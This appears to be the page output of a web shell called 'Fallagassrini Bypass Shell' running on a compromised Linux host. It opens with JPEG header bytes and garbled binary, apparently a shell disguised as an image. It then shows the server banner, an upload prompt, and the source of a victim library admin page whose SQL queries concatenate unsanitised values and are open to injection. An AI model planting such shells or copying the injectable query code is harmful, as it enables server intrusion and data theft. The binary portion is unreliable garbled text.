JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/llm/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/llm/branch_magazine.php

<?php include('config.php'); 
function getname($id)
{
$ret=mysql_fetch_row(mysql_query("select member_code from  members where id='".$id."'" ));
return $ret[0];
}

?>
<!DOCTYPE html>
<html lang="en">
	

<head>
		<meta charset="UTF-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0"> 
		<title>Cloud Admin Dashboard</title>
		<meta name="description" content="Cloud Admin Panel" />
		<meta name="keywords" content="Admin, Dashboard, Bootstrap3, Sass, transform, CSS3, HTML5, Web design, UI Design, Responsive Dashboard, Responsive Admin, Admin Theme, Best Admin UI, Bootstrap Theme, Bootstrap, Light weight Admin Dashboard,Light weight, Light weight Admin, Light weight Dashboard" />
		<!--<meta name="author" content="Bootstrap Gallery" />
		<link rel="shortcut icon" href="img/favicon.html">-->
		<link rel="stylesheet" href="css/bootstrap.min.css" />
<link rel="stylesheet" href="css/bootstrap-responsive.min.css" />
<link rel="stylesheet" href="css/colorpicker.css" />
<link rel="stylesheet" href="css/datepicker.css" />
<link rel="stylesheet" href="css/uniform.css" />
<link rel="stylesheet" href="css/select2.css" />
<link rel="stylesheet" href="css/matrix-style.css" />
<link rel="stylesheet" href="css/matrix-media.css" />
<link rel="stylesheet" href="css/bootstrap-wysihtml5.css" />
<link href="font-awesome/css/font-awesome.css" rel="stylesheet" />
<link href='http://fonts.googleapis.com/css?family=Open+Sans:400,700,800' rel='stylesheet' type='text/css'>

<link rel="stylesheet" href="css/animate.css" />
<link rel="stylesheet" href="css/fullcalendar.css" />
<link rel="stylesheet" href="css/jquery.gritter.css" />
		

	</head>  

	<body>

		<!-- Left sidebar start -->
		<?php include('left_menu.php'); ?>
		<!-- Left sidebar end -->

		<!-- Dashboard Wrapper Start -->
		<div class="dashboard-wrapper">

			<!-- Header start -->
			<?php include('header.php'); ?>
			<!-- Header ends -->

			<!-- Right sidebar start -->
			
			<!-- Right sidebar end -->

			<!-- Main Container Start -->
			<div id="content">
<!--breadcrumbs-->
  <div id="content-header">
    <div id="breadcrumb"> <a href="index.php" title="Go to Home" class="tip-bottom"><i class="icon-home"></i> Home</a><a href="#" class="tip-bottom">Branches</a> <a href="#" class="current">Manage Branch Magazine</a></div>
  </div>
<!--End-breadcrumbs-->

<!--Action boxes-->
  <div class="container-fluid">
    <div class="row-fluid">
  <div class="span12">
      <div class="widget-box">
        <div class="widget-title"> <span class="icon"> <i class="icon-th-large"></i> </span>
          <h5>Manage Branch Magazine</h5><span class="icon" style="float:right"><a href="#"> <i class="icon-th-list" title=""></i></a> </span>
        </div>
		
		<div class="widget-content nopadding">
					                <table class="table table-condensed table-striped table-bordered data-table" style="margin-top:20px">    
			                  <thead>
							 
			                    <tr>
			                      
			                     <th>S.No</th>
			                      <th style="width:10%">Branch Name</th>
			                      <th style="width:20%">Magazine Name</th>
			                      <th style="width:15%">Frequency</th>
                                  <th style="width:10%">Bar Code</th>
			                      <th style="width:5%">Shelf</th>
                                   <th style="width:5%">Status</th>
                                  <th style="width:10%">LastTaken</th>
                                  <th style="width:15%">Expected Checkin</th>
                                  <th style="width:15%">Action</th>
			                    </tr>
			                  </thead>
			                  <tbody>
							  <?php
							  $i=0; $j=0;
										//$source=mysql_query("select * from book where id in() order by id desc");
										if($_SESSION['branch']==0)
										$source=mysql_query("select *,br.id as rec_id from magazine_receipt br left join magazine b on br.magazine_id =b.id where br.status!=2 order by br.id desc limit 0,50");
										else
										$source=mysql_query("select *,br.id as rec_id from magazine_receipt br left join magazine b on br.magazine_id =b.id where br.branch_name='".$_SESSION['branch']."' and br.status!=2 order by br.id desc limit 0,50");
										
										while($step=mysql_fetch_array($source))
										{
										$i=$i+1;
										$j=$j+1;
										?>
                    
			                    <tr class="gradeA">
                              
								<input type="hidden" name="book_receipt_id_<?php echo $i;?>" id="book_receipt_id_<?php echo $i;?>" value="<?php echo $step['rec_id'];?>"/>
							  <td>	<?php echo $j;?></td>
			                     <td>
                                  <?php $author=mysql_fetch_array(mysql_query("select * from branches where id='".$step['branch_name']."'")); ?>
								  <?php echo $author['name']; ?>
			                       
			                      </td>
			                      <td  title="<?php echo $step['name']; ?>"><?php echo substr($step['name'],0,25); ?></td>
			                      
			                      <td>
								   
								  <?php echo $step['frequency']; ?>
			                       
			                      </td>
                                  <td>
								  <span id="barcode_<?php echo $i;?>">
								     <?php echo $step['bar_code']; ?>
                                  </span>
                                  <span id="barcode_text_<?php echo $i;?>" style="display:none">
                                  <input type="text" name="barcode_num_<?php echo $i;?>" id="barcode_num_<?php echo $i;?>" value="<?php echo $step['bar_code']; ?>" />
                                  </span>
                                  
                                  
								  </td>
			                     <td>
								 <span id="shelf_<?php echo $i;?>">
								     <?php echo $step['shelf_rack']; ?>
                                  </span>
                                  <span id="shelf_text_<?php echo $i;?>" style="display:none">
                                  <input type="text" name="shelf_num_<?php echo $i;?>" id="shelf_num_<?php echo $i;?>" value="<?php echo $step['shelf_rack']; ?>" />
                                  </span>
								 
								 </td>
                                                                  <td>
                                 <?php
								 if($step['book_status']==0)
								 echo 'A';
								 else if($step['book_status']==1)
								 echo 'C';
								 else if($step['book_status']==2)
								 echo 'B';
								 else if($step['book_status']==3)
								 echo 'S';
								 else if($step['book_status']==4)
								 echo 'Scrap';
								  else if($step['book_status']==5)
								 echo 'Transfer Out';
								 
								 ?>
                                 </td>
                                  <td>
                                 <?php
								 if($step['taken_by']!='')
								 echo getname($step['taken_by']);
								 else
								 echo '-';
								?>
                                 </td>
                                  <td>
                                 <?php
								 if($step['book_status']==1)
								 echo $step['check_in_date'];
								  else
								 echo '-';
								?>
                                 </td>

			                      <td>
                                 <span id="bookcopyid_<?php echo $i;?>">
                                 <input type="button" name="add_copy" value="Edit" onClick="bookcopy(<?php echo $i;?>);">
                                 </span>
                                 <span id="bookconfirmid_<?php echo $i;?>" style="display:none">
                                 <input type="button" name="add_confirm" value="Confirm" onClick="bookconfirm(<?php echo $i;?>);">
                                 </span>
                                  </td>
			                    </tr>
			                    
			                    	<?php } ?>
			             
			            <?php if($_GET['msg']=='deleted') { ?> <p <b style="color:#900">Deleted Successfully</p> <?php } ?>
			                  </tbody>
			                </table>
			              </div>
			            </div>
			          </div>
			        </div>
			      </div>

					</div>

				<!-- Container fluid ends -->

			<!-- Main Container Start -->

			<!-- Footer Start -->
			<div class="row-fluid">
  <div id="footer" class="span12"> Copyright Cloud Admin <span>2015</span>. All Rights Reserved. </div>
</div>

			<!-- Footer end -->
			
		</div>
		<!-- Dashboard Wrapper End -->

		<!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
		<script src="js/jquery.js"></script>
        
               <script type="text/javascript">
		function bookcopy(id)
{
$('#bookcopyid_'+id).hide();
$('#bookconfirmid_'+id).show();
$('#allot_copy_'+id).hide();
$('#allot_copy_text_'+id).show();
$('#comment_text_'+id).hide();
$('#comments_input_'+id).show();

$('#barcode_'+id).hide();
$('#barcode_text_'+id).show();

$('#shelf_'+id).hide();
$('#shelf_text_'+id).show();


}

function bookconfirm(id)
{
if($('#shelf_num_'+id).val()=='')
alert("Please Enter Shelf/Rack Number");
else if($('#barcode_num_'+id).val()=='')
alert("Please Enter Barcode Number");
else
{

$.ajax({
		type: "POST",
		url: "magazine_branch_update.php",
		data: {branch_id:$('#book_receipt_id_'+id).val(),barcode:$('#barcode_num_'+id).val(), shelf:$('#shelf_num_'+id).val()},
		success: function(data) {
					
					if(data==0)
					alert("Barcode already used, Kindly give new barcode")
					else
					{
					$('#bookcopyid_'+id).show();
					$('#bookconfirmid_'+id).hide();
					$('#allot_copy_'+id).show();
					$('#allot_copy_text_'+id).hide();
					$('#comment_text_'+id).show();
					$('#comments_input_'+id).hide();
					$('#allot_copy_'+id).text($('#allot_copy_num_'+id).val());
					$('#comment_text_'+id).text($('#comments_'+id).val());
					$('#barcode_'+id).text($('#barcode_num_'+id).val());
					$('#shelf_'+id).text($('#shelf_num_'+id).val());
					
					$('#barcode_'+id).show();
					$('#barcode_text_'+id).hide();
					$('#shelf_'+id).show();
					$('#shelf_text_'+id).hide();
					
					alert("Updated Successfully");
					}
					
                	}
                
			
		});

}	
	}

		</script>


		<!-- Include all compiled plugins (below), or include individual files as needed -->
		<script src="js/jquery.min.js"></script> 
		<script src="js/jquery.ui.custom.js"></script> 
		<script src="js/bootstrap.min.js"></script> 
		<script src="js/jquery.uniform.js"></script> 
		<script src="js/select2.min.js"></script> 
		<script src="js/jquery.dataTables.min.js"></script> 
		<script src="js/matrix.js"></script> 
		<script src="js/matrix.tables.js"></script>
		<script src="js/jquery.ui.custom.js"></script> 
		<script src="js/bootstrap-colorpicker.js"></script> 
		<script src="js/bootstrap-datepicker.js"></script> 
		<script src="js/jquery.toggle.buttons.js"></script> 
		<script src="js/masked.js"></script> 
		<script src="js/excanvas.min.js"></script> 
<script src="js/jquery.flot.min.js"></script> 
<script src="js/jquery.flot.resize.min.js"></script> 
<script src="js/matrix.dashboard.js"></script> 
<script src="js/matrix.form_validation.js"></script> 
<script src="js/jquery.wizard.js"></script> 
<script src="js/jquery.uniform.js"></script> 
<script src="js/matrix.popover.js"></script> 
<script src="js/jquery.dataTables.min.js"></script> 
<script src="js/matrix.tables.js"></script> 

		<script type="text/javascript">
      //Data Tables
      $(document).ready(function () {
        $('#data-table').dataTable({
		"bSort": false,
          "sPaginationType": "full_numbers"
        });
        $("#data-table_length").css("display","none")
      });
    </script>
<style type="text/css">
	
	button, input, select, textarea {
    border: 2px solid #bfe0f3;
    border-radius: 0;
    box-shadow: none;
    height: 40px;
	 padding: 8px 16px;
}
	
	
	.read_charges {
    border: 2px solid #bfe0f3;
    border-radius: 0;
    box-shadow: none;
    height: 40px;
    padding: 8px 16px;
}
	</style>
	</body>

<!-- Mirrored from jesus.gallery/cloud2/invoice.html by HTTrack Website Copier/3.x [XR&CO'2013], Sat, 18 Apr 2015 04:41:37 GMT -->
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net